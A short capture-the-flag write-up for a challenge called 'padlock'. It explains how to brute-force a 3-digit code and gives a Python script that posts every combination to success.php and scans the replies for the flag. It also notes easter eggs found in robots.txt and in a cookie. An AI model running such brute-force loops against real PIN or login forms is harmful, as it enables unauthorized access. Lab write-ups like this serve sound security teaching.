1.5 KiB
CHALLENGE padlock
Writeup
To get the flag, a 3-digit code has to be found. As 3 digits only offers 999 combinations, brute-force would be the way to go.
In the source code of index.php, we can find that for each try, a POST-request is sent to success.php. The post request contains 3 values: try100, try10 and try1. In the brute-force we have to enumerate each value from 0 to 9. We can check each response for the flag by looking for "IG{. If we got a match the respons might contain a flag.
A simple brute-force program in Python would look like this:
import requests
# change URL path
url = "success.php"
def checkForSolution(text):
if text.find("IG{") == -1:
return False
else:
substr = text.find("IG{")
print(text[substr:text.find("}", substr) + 1])
return True
def bruteForce():
for h in range(10):
for t in range(10):
for u in range(10):
param = {'try100': h, 'try10': t, 'try1': u}
req = requests.post(url, data = param)
print("try:", h, t, u)
if checkForSolution(req.text):
return True
bruteForce()
Easter eggs
In robots.txt a file flag.txt is disallowed, this file contains an ascii-art of a beautiful flag.
Trying combinations like '420' or '069' will redirect to a new page. Also a cookie is placed, as long as this cookie exists, the index page shows a 4-digit combination. However, this newly placed digit does not do anything.
The cookie placed contains a Base64-string.